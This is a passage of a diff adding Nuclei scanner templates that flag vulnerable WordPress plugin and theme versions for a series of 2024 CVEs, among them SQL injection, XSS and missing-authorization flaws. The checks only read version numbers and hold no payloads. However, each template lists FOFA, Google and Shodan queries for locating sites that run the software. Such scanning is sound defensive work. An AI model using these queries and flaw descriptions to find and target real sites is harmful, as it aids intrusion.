Recipe Plugin <= 1.6.7 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Delicious Recipes – WordPress Recipe Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 1.6.7 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/32483206-7d8f-4b9e-ab44-967a4b7145b4?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-43935 + metadata: + fofa-query: "wp-content/plugins/delicious-recipes/" + google-query: inurl:"/wp-content/plugins/delicious-recipes/" + shodan-query: 'vuln:CVE-2024-43935' + tags: cve,wordpress,wp-plugin,delicious-recipes,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/delicious-recipes/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "delicious-recipes" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.6.7') \ No newline at end of file diff --git a/nuclei-templates/CVE-2024/CVE-2024-43936.yaml b/nuclei-templates/CVE-2024/CVE-2024-43936.yaml new file mode 100644 index 0000000000..24f948fd15 --- /dev/null +++ b/nuclei-templates/CVE-2024/CVE-2024-43936.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-43936 + +info: + name: > + EmbedPress <= 4.0.8 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The EmbedPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 4.0.8 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/31f8bd62-32de-468c-9bed-e03374cb595c?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-43936 + metadata: + fofa-query: "wp-content/plugins/embedpress/" + google-query: inurl:"/wp-content/plugins/embedpress/" + shodan-query: 'vuln:CVE-2024-43936' + tags: cve,wordpress,wp-plugin,embedpress,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/embedpress/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "embedpress" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 4.0.8') \ No newline at end of file diff --git a/nuclei-templates/CVE-2024/CVE-2024-43937.yaml b/nuclei-templates/CVE-2024/CVE-2024-43937.yaml new file mode 100644 index 0000000000..017b15200b --- /dev/null +++ b/nuclei-templates/CVE-2024/CVE-2024-43937.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-43937 + +info: + name: > + WP Crowdfunding <= 2.1.10 - Missing Authorization to Authenticated (Subscriber+) to Enable/Disable Addons + author: topscoder + severity: low + description: > + The WP Crowdfunding plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the addon_enable_disable() function in all versions up to, and including, 2.1.10. This makes it possible for authenticated attackers, with Subscriber-level access and above, to enable/disable addons. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/0cf65972-a651-41b0-8f57-709e0ff685fa?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N + cvss-score: 5.3 + cve-id: CVE-2024-43937 + metadata: + fofa-query: "wp-content/plugins/wp-crowdfunding/" + google-query: inurl:"/wp-content/plugins/wp-crowdfunding/" + shodan-query: 'vuln:CVE-2024-43937' + tags: cve,wordpress,wp-plugin,wp-crowdfunding,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-crowdfunding/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-crowdfunding" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.1.10') \ No newline at end of file diff --git a/nuclei-templates/CVE-2024/CVE-2024-43938.yaml b/nuclei-templates/CVE-2024/CVE-2024-43938.yaml new file mode 100644 index 0000000000..f2a8d6cb56 --- /dev/null +++ b/nuclei-templates/CVE-2024/CVE-2024-43938.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-43938 + +info: + name: > + Name Directory <= 1.29.0 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + The Name Directory plugin for WordPress is vulnerable to Reflected Cross-Site Scripting in all versions up to, and including, 1.29.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/e9f9f72f-01f4-47db-8efd-f25f0276896f?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-43938 + metadata: + fofa-query: "wp-content/plugins/name-directory/" + google-query: inurl:"/wp-content/plugins/name-directory/" + shodan-query: 'vuln:CVE-2024-43938' + tags: cve,wordpress,wp-plugin,name-directory,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/name-directory/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "name-directory" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.29.0') \ No newline at end of file diff --git a/nuclei-templates/CVE-2024/CVE-2024-43939.yaml b/nuclei-templates/CVE-2024/CVE-2024-43939.yaml new file mode 100644 index 0000000000..3a07864b88 --- /dev/null +++ b/nuclei-templates/CVE-2024/CVE-2024-43939.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-43939 + +info: + name: > + Zynith SEO <= 7.4.9 - Missing Authorization to Unauthenticated Arbitrary Option Deletion + author: topscoder + severity: high + description: > + The Zynith SEO plugin for WordPress is vulnerable to unauthorized modification of data that can lead to a denial of service due to a missing capability check on a function in all versions up to, and including, 7.4.9. This makes it possible for unauthenticated attackers to delete arbitrary option values on the WordPress site. This can be leveraged to delete an option that would create an error on the site and deny service to legitimate users. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/813532fd-0613-47df-a4d0-54d6b33f37b3?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H + cvss-score: 9.1 + cve-id: CVE-2024-43939 + metadata: + fofa-query: "wp-content/plugins/zynith-seo/" + google-query: inurl:"/wp-content/plugins/zynith-seo/" + shodan-query: 'vuln:CVE-2024-43939' + tags: cve,wordpress,wp-plugin,zynith-seo,high + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/zynith-seo/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "zynith-seo" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 7.4.9') \ No newline at end of file diff --git a/nuclei-templates/CVE-2024/CVE-2024-43940.yaml b/nuclei-templates/CVE-2024/CVE-2024-43940.yaml new file mode 100644 index 0000000000..5fb13035a0 --- /dev/null +++ b/nuclei-templates/CVE-2024/CVE-2024-43940.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-43940 + +info: + name: > + Zynith SEO <= 7.4.9 - Missing Authorization to Unauthenticated Settings Update + author: topscoder + severity: high + description: > + The Zynith SEO plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in all versions up to, and including, 7.4.9. This makes it possible for unauthenticated attackers to update the plugin's settings. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/9a4a2b01-450d-46fb-9de5-0de40b590201?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N + cvss-score: 5.3 + cve-id: CVE-2024-43940 + metadata: + fofa-query: "wp-content/plugins/zynith-seo/" + google-query: inurl:"/wp-content/plugins/zynith-seo/" + shodan-query: 'vuln:CVE-2024-43940' + tags: cve,wordpress,wp-plugin,zynith-seo,high + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/zynith-seo/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "zynith-seo" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 7.4.9') \ No newline at end of file diff --git a/nuclei-templates/CVE-2024/CVE-2024-43941.yaml b/nuclei-templates/CVE-2024/CVE-2024-43941.yaml new file mode 100644 index 0000000000..cf3580e5f7 --- /dev/null +++ b/nuclei-templates/CVE-2024/CVE-2024-43941.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-43941 + +info: + name: > + Propovoice Pro <= 1.7.0.3 - Unauthenticated SQL Injection + author: topscoder + severity: critical + description: > + The Propovoice Pro plugin for WordPress is vulnerable to SQL Injection in versions up to, and including, 1.7.0.3 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/3df23ba9-337f-49ac-9d1f-6b993430a1ce?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10 + cve-id: CVE-2024-43941 + metadata: + fofa-query: "wp-content/plugins/propovoice-pro/" + google-query: inurl:"/wp-content/plugins/propovoice-pro/" + shodan-query: 'vuln:CVE-2024-43941' + tags: cve,wordpress,wp-plugin,propovoice-pro,critical + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/propovoice-pro/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "propovoice-pro" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.7.0.3') \ No newline at end of file diff --git a/nuclei-templates/CVE-2024/CVE-2024-43942.yaml b/nuclei-templates/CVE-2024/CVE-2024-43942.yaml new file mode 100644 index 0000000000..02a363b235 --- /dev/null +++ b/nuclei-templates/CVE-2024/CVE-2024-43942.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-43942 + +info: + name: > + Greenshift Query and Meta Addon < 3.9.2 - Authenticated (Subscriber+) SQL Injection + author: topscoder + severity: low + description: > + The Greenshift Query and Meta Addon plugin for WordPress is vulnerable to SQL Injection in versions up to 3.9.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with subscriber-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/8d54079a-1a7e-4391-b7ee-d06d7f8b2312?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H + cvss-score: 9.9 + cve-id: CVE-2024-43942 + metadata: + fofa-query: "wp-content/plugins/greenshiftquery/" + google-query: inurl:"/wp-content/plugins/greenshiftquery/" + shodan-query: 'vuln:CVE-2024-43942' + tags: cve,wordpress,wp-plugin,greenshiftquery,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/greenshiftquery/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "greenshiftquery" + part: body + + - type: dsl + dsl: + - compare_versions(version, '< 3.9.2') \ No newline at end of file diff --git a/nuclei-templates/CVE-2024/CVE-2024-43943.yaml b/nuclei-templates/CVE-2024/CVE-2024-43943.yaml new file mode 100644 index 0000000000..c014db6220 --- /dev/null +++ b/nuclei-templates/CVE-2024/CVE-2024-43943.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-43943 + +info: + name: > + Woocommerce Addon by Greenshift< 1.9.8 - Authenticated (Subscriber+) SQL Injection + author: topscoder + severity: low + description: > + The Woocommerce Addon by Greenshift plugin for WordPress is vulnerable to SQL Injection in versions up to 1.9.8 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with subscriber-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/ee6f936b-704a-486f-836b-9a1892271bfa?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H + cvss-score: 9.9 + cve-id: CVE-2024-43943 + metadata: + fofa-query: "wp-content/plugins/greenshiftwoo/" + google-query: inurl:"/wp-content/plugins/greenshiftwoo/" + shodan-query: 'vuln:CVE-2024-43943' + tags: cve,wordpress,wp-plugin,greenshiftwoo,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/greenshiftwoo/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "greenshiftwoo" + part: body + + - type: dsl + dsl: + - compare_versions(version, '< 1.9.8') \ No newline at end of file diff --git a/nuclei-templates/CVE-2024/CVE-2024-43944.yaml b/nuclei-templates/CVE-2024/CVE-2024-43944.yaml new file mode 100644 index 0000000000..abacceb7d2 --- /dev/null +++ b/nuclei-templates/CVE-2024/CVE-2024-43944.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-43944 + +info: + name: > + Maintenance & Coming Soon Redirect Animation <= 2.1.3 - IP Spoofing to Bypass + author: topscoder + severity: medium + description: > + The Maintenance & Coming Soon Redirect Animation plugin for WordPress is vulnerable to IP Address Spoofing in all versions up to, and including, 2.1.3 due to insufficient IP address validation and/or use of user-supplied HTTP headers as a primary method for IP retrieval. This makes it possible for unauthenticated attackers to bypass IP restrictions. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/c87e8245-236f-4ab8-837b-c5eeec92bb0c?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cve-id: CVE-2024-43944 + metadata: + fofa-query: "wp-content/plugins/maintenance-coming-soon-redirect-animation/" + google-query: inurl:"/wp-content/plugins/maintenance-coming-soon-redirect-animation/" + shodan-query: 'vuln:CVE-2024-43944' + tags: cve,wordpress,wp-plugin,maintenance-coming-soon-redirect-animation,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/maintenance-coming-soon-redirect-animation/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "maintenance-coming-soon-redirect-animation" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.1.3') \ No newline at end of file diff --git a/nuclei-templates/CVE-2024/CVE-2024-43945.yaml b/nuclei-templates/CVE-2024/CVE-2024-43945.yaml new file mode 100644 index 0000000000..33a5d6f162 --- /dev/null +++ b/nuclei-templates/CVE-2024/CVE-2024-43945.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-43945 + +info: + name: > + LatePoint <= 4.9.91 - Cross-Site Request Forgery + author: topscoder + severity: medium + description: > + The LatePoint plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 4.9.91. This is due to missing or incorrect nonce validation on a function. This makes it possible for unauthenticated attackers to perform an unauthorized action via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/bd240932-ad50-40b3-94c7-6e885f96c5df?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N + cvss-score: 4.3 + cve-id: CVE-2024-43945 + metadata: + fofa-query: "wp-content/plugins/LatePoint/" + google-query: inurl:"/wp-content/plugins/LatePoint/" + shodan-query: 'vuln:CVE-2024-43945' + tags: cve,wordpress,wp-plugin,LatePoint,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/LatePoint/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "LatePoint" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 4.9.91') \ No newline at end of file diff --git a/nuclei-templates/CVE-2024/CVE-2024-43946.yaml b/nuclei-templates/CVE-2024/CVE-2024-43946.yaml new file mode 100644 index 0000000000..ce3d5b2a8a --- /dev/null +++ b/nuclei-templates/CVE-2024/CVE-2024-43946.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-43946 + +info: + name: > + SKT Blocks – Gutenberg based Page Builder <= 1.5 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The SKT Blocks – Gutenberg based Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 1.5 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/8a2cd4d3-12d3-43bd-bde1-927b793f04a8?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-43946 + metadata: + fofa-query: "wp-content/plugins/skt-blocks/" + google-query: inurl:"/wp-content/plugins/skt-blocks/" + shodan-query: 'vuln:CVE-2024-43946' + tags: cve,wordpress,wp-plugin,skt-blocks,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/skt-blocks/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "skt-blocks" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.5') \ No newline at end of file diff --git a/nuclei-templates/CVE-2024/CVE-2024-43947.yaml b/nuclei-templates/CVE-2024/CVE-2024-43947.yaml new file mode 100644 index 0000000000..dae392823d --- /dev/null +++ b/nuclei-templates/CVE-2024/CVE-2024-43947.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-43947 + +info: + name: > + WP Armour Extended <= 1.26 - Cross-Site Request Forgery + author: topscoder + severity: medium + description: > + The WP Armour Extended plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.26. This is due to missing or incorrect nonce validation on a function. This makes it possible for unauthenticated attackers to perform an unauthorized action via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/65aedeef-d370-4d04-9396-1cf6a2b29033?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N + cvss-score: 4.3 + cve-id: CVE-2024-43947 + metadata: + fofa-query: "wp-content/plugins/wp-armour-extended/" + google-query: inurl:"/wp-content/plugins/wp-armour-extended/" + shodan-query: 'vuln:CVE-2024-43947' + tags: cve,wordpress,wp-plugin,wp-armour-extended,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-armour-extended/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-armour-extended" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.26') \ No newline at end of file diff --git a/nuclei-templates/CVE-2024/CVE-2024-43948.yaml b/nuclei-templates/CVE-2024/CVE-2024-43948.yaml new file mode 100644 index 0000000000..8156303588 --- /dev/null +++ b/nuclei-templates/CVE-2024/CVE-2024-43948.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-43948 + +info: + name: > + WP Armour Extended <= 1.26 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + The WP Armour Extended plugin for WordPress is vulnerable to Reflected Cross-Site Scripting in versions up to, and including, 1.26 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/224bf516-fac7-492f-87b9-912472ca01c9?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-43948 + metadata: + fofa-query: "wp-content/plugins/wp-armour-extended/" + google-query: inurl:"/wp-content/plugins/wp-armour-extended/" + shodan-query: 'vuln:CVE-2024-43948' + tags: cve,wordpress,wp-plugin,wp-armour-extended,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-armour-extended/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-armour-extended" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.26') \ No newline at end of file diff --git a/nuclei-templates/CVE-2024/CVE-2024-43949.yaml b/nuclei-templates/CVE-2024/CVE-2024-43949.yaml new file mode 100644 index 0000000000..ac58331865 --- /dev/null +++ b/nuclei-templates/CVE-2024/CVE-2024-43949.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-43949 + +info: + name: > + GHActivity <= 2.0.0-alpha - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The GHActivity plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 2.0.0-alpha due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/b4827732-41ff-4a14-bb5e-4f7888ffd733?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-43949 + metadata: + fofa-query: "wp-content/plugins/ghactivity/" + google-query: inurl:"/wp-content/plugins/ghactivity/" + shodan-query: 'vuln:CVE-2024-43949' + tags: cve,wordpress,wp-plugin,ghactivity,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/ghactivity/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "ghactivity" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.0.0-alpha') \ No newline at end of file diff --git a/nuclei-templates/CVE-2024/CVE-2024-43950.yaml b/nuclei-templates/CVE-2024/CVE-2024-43950.yaml new file mode 100644 index 0000000000..ff5a7704f8 --- /dev/null +++ b/nuclei-templates/CVE-2024/CVE-2024-43950.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-43950 + +info: + name: > + Brickscore <= 1.4.2.5 - Unauthenticated Stored Cross-Site Scripting + author: topscoder + severity: high + description: > + The brickscore plugin for WordPress is vulnerable to Stored Cross-Site Scripting in all versions up to, and including, 1.4.2.5 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/31a04983-a1d9-49b3-9f1f-06fb3480531b?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N + cvss-score: 7.2 + cve-id: CVE-2024-43950 + metadata: + fofa-query: "wp-content/plugins/brickscore/" + google-query: inurl:"/wp-content/plugins/brickscore/" + shodan-query: 'vuln:CVE-2024-43950' + tags: cve,wordpress,wp-plugin,brickscore,high + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/brickscore/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "brickscore" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.4.2.5') \ No newline at end of file diff --git a/nuclei-templates/CVE-2024/CVE-2024-43951.yaml b/nuclei-templates/CVE-2024/CVE-2024-43951.yaml new file mode 100644 index 0000000000..ae9fdc29a5 --- /dev/null +++ b/nuclei-templates/CVE-2024/CVE-2024-43951.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-43951 + +info: + name: > + Tempera <= 1.8.2 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Tempera theme for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 1.8.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/c33f8b0d-97d9-4d00-bd31-444ee2afbfe6?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-43951 + metadata: + fofa-query: "wp-content/themes/tempera/" + google-query: inurl:"/wp-content/themes/tempera/" + shodan-query: 'vuln:CVE-2024-43951' + tags: cve,wordpress,wp-theme,tempera,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/themes/tempera/style.css" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Version: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 